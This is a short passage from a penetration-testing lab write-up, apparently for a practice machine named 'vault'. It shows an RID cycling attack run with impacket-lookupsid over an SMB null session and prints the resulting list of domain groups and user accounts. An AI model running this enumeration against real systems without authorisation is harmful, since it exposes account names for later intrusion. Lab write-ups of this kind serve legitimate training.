RID Cycling
The target SMB server allows null session. This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-lookupsid VAULT.OFFSEC/blahblah@dc.vault.offsec 1000000
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at dc.vault.offsec
[*] StringBinding ncacn_np:dc.vault.offsec[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VAULT\Administrator (SidTypeUser)
501: VAULT\Guest (SidTypeUser)
502: VAULT\krbtgt (SidTypeUser)
512: VAULT\Domain Admins (SidTypeGroup)
513: VAULT\Domain Users (SidTypeGroup)
514: VAULT\Domain Guests (SidTypeGroup)
515: VAULT\Domain Computers (SidTypeGroup)
516: VAULT\Domain Controllers (SidTypeGroup)
517: VAULT\Cert Publishers (SidTypeAlias)
518: VAULT\Schema Admins (SidTypeGroup)
519: VAULT\Enterprise Admins (SidTypeGroup)
520: VAULT\Group Policy Creator Owners (SidTypeGroup)
521: VAULT\Read-only Domain Controllers (SidTypeGroup)
522: VAULT\Cloneable Domain Controllers (SidTypeGroup)
525: VAULT\Protected Users (SidTypeGroup)
526: VAULT\Key Admins (SidTypeGroup)
527: VAULT\Enterprise Key Admins (SidTypeGroup)
553: VAULT\RAS and IAS Servers (SidTypeAlias)
571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias)
572: VAULT\Denied RODC Password Replication Group (SidTypeAlias)
1000: VAULT\DC$ (SidTypeUser)
1101: VAULT\DnsAdmins (SidTypeAlias)
1102: VAULT\DnsUpdateProxy (SidTypeGroup)
1103: VAULT\anirudh (SidTypeUser)Performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah
Besides the all those default domain accounts, anirudh is the only user.
Those usernames have been saved to the users.txt file